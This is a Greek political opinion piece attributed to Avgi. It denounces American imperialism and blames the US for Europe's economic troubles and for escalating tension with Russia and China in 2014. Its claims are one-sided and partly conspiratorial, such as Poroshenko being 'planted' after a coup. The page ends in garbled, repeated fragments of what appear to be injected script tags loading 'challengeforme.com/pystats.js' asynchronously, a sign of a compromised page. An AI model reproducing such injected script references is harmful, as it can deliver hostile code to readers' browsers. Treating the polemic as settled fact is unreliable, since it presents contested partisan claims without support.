Αγριεύει και απειλεί ο αμερικανικός ιμπεριαλισμός…Χρήστου Δημήτρης

Η Ευρώπη πλήρωσε και θα πληρώσει πολλά ακόμα από την τυφλή υποταγή της στα αμερικανικά συμφέροντα. ΟΙ ΗΠΑ ήταν, είναι και θέλoυν να μείνoυν ο απόλυτος νταβατζής της.

«Μόλις πριν από μερικούς μήνες οι ηγέτες της Ευρωζώνης, πιστεύοντας ότι έχουν περάσει τα δύσκολα, επαναπαύτηκαν» αναφέρει ο Economist σε μια ενδιαφέρουσα ανάλυση και συνεχίζει: ” Όλα αυτά ήταν μια ψευδαίσθηση. Τις τελευταίες εβδομάδες οι χώρες της Ευρωζώνης άρχισαν να ‘μπάζουν νερά’ για ακόμη μια φορά. Το συλλογικό τους ΑΕΠ παρέμεινε στάσιμο στο δεύτερο τέταρτο του 2014: Το τρίτο τέταρτο του έτους αναμένεται αρκετά ασταθές, κυρίως επειδή η ζώνη του ευρώ θα υποστεί επιπλέον απώλειες από τις κυρώσεις της Δύσης στη Ρωσία και αντιστρόφως. Η Ευρωζώνη στέκεται (ή καλύτερα ακροβατεί) σε αντίθεση με την Αμερική και τη Βρετανία, των οποίων οι οικονομίες απολαμβάνουν βιώσιμη ανάπτυξη”.

ΑΝ ΜΕΙΝΟΥΝ τα πράγματα ως έχουν και με πρόεδρο της Κομισιόν τον “κ. τίποτα”, όπως χαρακτηρίζει τον Ζ.-Κ. Γιούγκερ το βρετανικό περιοδικό, η ανάπτυξη δεν θα επιστρέψει και ο αποπληθωρισμός θα παγώσει. Η Ιαπωνία αντιμετώπισε μια ολόκληρη δεκαετία (1990) χαμένης ανάπτυξης και ακόμη παλεύει. Σε αντίθεση, όμως, με την Ιαπωνία, η Ευρώπη δεν είναι μια συμπαγής χώρα και εφόσον η νομισματική ένωση δεν φέρνει παρά μόνο στασιμότητα, τότε κάποιοι θα ψηφίσουν για αποχώρηση από το ευρώ. Ενδιαφέρουσες πλευρές, μόνο που απουσιάζει ο βασικός καταλύτης της ευρωπαϊκής κρίσης. Μέχρι σήμερα ο αμερικανικός ιμπεριαλισμός έκοβε και έραβε σε περιοχές κυρίως της Μέσης Ανατολής. Έτσι φαινόταν τουλάχιστον. Το διεθνές δίκαιο είχε διαλυθεί μονομερώς από τις ΗΠΑ και τον μπάτλερ τους, τη Βρετανία.

ΓΙΑΤΙ όμως οι ΗΠΑ θέλησαν να εγκαταστήσουν πυραύλους μεγάλου βεληνεκούς στην Πολωνία και την Τσεχία, δηλώνοντας προκλητικά ότι αυτοί οι πύραυλοι θα προστατεύουν την Ευρώπη από ενδεχόμενη πυρηνική επίθεση του Ιράν; Και είναι τόσο κυνικοί, ελέγχοντας το μεγαλύτερο μέρος της παγκόσμιας προπαγάνδας, που περίμεναν από τον Πούτιν να τους ευχαριστήσει! Η Ρωσία είναι κυκλωμένη από αμερικανικούς πυραύλους. Το ίδιο και η Κίνα. Είναι σαν τον καουμπόι που σε σημαδεύει με δύο πιστόλες και σου λέει ότι, αν δεν κάνεις αυτό που σε διατάσσει, θα σε στείλει αδιάβαστο. Το ευρωπαϊκό σχέδιο της ευρωπαϊκής ενοποίησης, έμεινε ημιτελές με διαταγή των ΗΠΑ, που έχωσαν τουλάχιστον δέκα δικές τους χώρες στην Ε.Ε. των 27 για να ελέγχουν τις εξελίξεις. Η Ευρώπη πλήρωσε και θα πληρώσει πολλά ακόμα από την τυφλή υποταγή της στα αμερικανικά συμφέροντα. ΟΙ ΗΠΑ ήταν, είναι και θέλουν να μείνουν ο απόλυτος νταβατζής της.

ΣΤΗ ΡΩΣΙΑ -σήμερα- παίζεται η προτελευταία παρτίδα στην παγκόσμια σκακιέρα. Η τελευταία, αναλόγως της εξέλιξης, θα είναι αυτή με την Κίνα. Υποτίθεται πως η κλιμάκωση του εμπορικού πολέμου με τη Μόσχα προκλήθηκε από την εγκληματική κατάρριψη του μαλαισιανού Boeing. Επισήμως, πριν λίγες μέρες ο υπουργός Εξωτερικών της Ρωσίας Σ. Λαβρόφ ζήτησε να μάθει ποια είναι τα αποτελέσματα από τα μαύρα κουτιά του μοιραίου αεροσκάφους, τα οποία πήγαν στην Ολλανδία για ανάλυση, αλλά απάντηση δεν έλαβε! Γιατί; Τα σχέδια της Ουάσιγκτον δεν είναι φυσικά μυστικά, για να αγνοηθούν οι κίνδυνοι και οι προκλήσεις από τις χώρες στόχους, δηλαδή τη Ρωσία και την Κίνα. Ούτε ο Πούτιν, που παρέλαβε από τους Κινέζους τον Σνόουτεν αιφνιδιάστηκε, ούτε το Πεκίνο.

ΧΩΡΙΣ αυταρχικές εκτροπές ακόμα και πολεμικές συρράξεις, ο πολιτικός έλεγχος της Ευρώπης και η εκβιαστική συνοχή της δεν θα αντέξουν για πολύ. Ας μην ξεχνάμε πως οικονομικά Γερμανία, Γαλλία και Ιταλία αποτελούν τα 2/3 του ΑΕΠ της Ε.Ε. Ένας από του κρίκους να σπάσει, η κρίση θα γίνει ντόμινο. Τα αδιέξοδα του νεοφιλελευθερισμού που επιχειρεί να γυρίσει τον κόσμο σε μια νέου τύπου φεουδαρχία, εκτός από τις αρπαγές και τις ληστείες, φαίνεται ότι θα χρειαστούν και αίμα, σαν τους βρυκόλακες. Επικίνδυνο παιχνίδι, καθώς θα παιχθεί σε μια από τις πιο δύσκολες πολεμικές έδρες στην παγκόσμια ιστορία. Μια έδρα στην οποία δεν νίκησε ποτέ κανείς. Ήδη ο φυτευτός μετά το πραξικόπημα πρόεδρος Ποροσένκο, παρ’ ότι συμφώνησε με τον Πούτιν ότι η κρίση δεν μπορεί να επιλυθεί με στρατιωτικά μέσα, με το που έφυγε από το Μινσκ άρχισε να φωνάζει για νέες ρωσικές εισβολές και να εκπέμπει SOS για τον χειμώνα που πλησιάζει.

ΤΑ ΣΧΕΔΙΑ της Ουάσιγκτον είναι άκρως επικίνδυνα. Απλά δεν γνωρίζουμε την κλιμάκωση, τη σύγκρουση και το αποτέλεσμα. Η Γερμανία, αν και στην αρχή αμήχανη, σύρεται από τους Αμερικανούς που είναι σε θέση να εκβιάσουν τους πάντες λόγω των τεράστιων πληροφοριών που έχουν υποκλέψει. Θυμίζει σε τίποτα Γαλλία αυτή η χώρα που έχει για πρόεδρο έναν τύπο σαν τον Ολάντ, ικανό να μεταφέρει την έδρα της κυβέρνησής του στο Βισί; Σε αυτόν το βαρύ ορίζοντα η Ελλάδα εξακολουθεί να έχει μια κυβέρνηση που περιορίζεται στον ρόλο δημόσιας υπηρεσίας που έχει υποχρέωση να μεταφράζει από τα αγγλικά τις εντολές και ετοιμάζεται να στήσει γλέντι (!) που διώχνει την τρόικα, που φεύγει μόνη της και καταργεί τα Μνημόνια, που μένουν, σε μια χώρα με χρέος 170%, φορολογικές επιδρομές εξαθλίωσης των πολιτών, ανεργία ρεκόρ και κατεστραμμένη παραγωγική βάση. Και αυτή η κυβέρνηση, έστω με νύχια και με δόντια, επιβιώνει εκμεταλλευόμενη τα ελλείμματα κοινωνικής και εθνικής συνείδησης.

Αγριεύει και απειλεί ο αμερικανικός ιμπεριαλισμός

πηγή: Αυγή challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >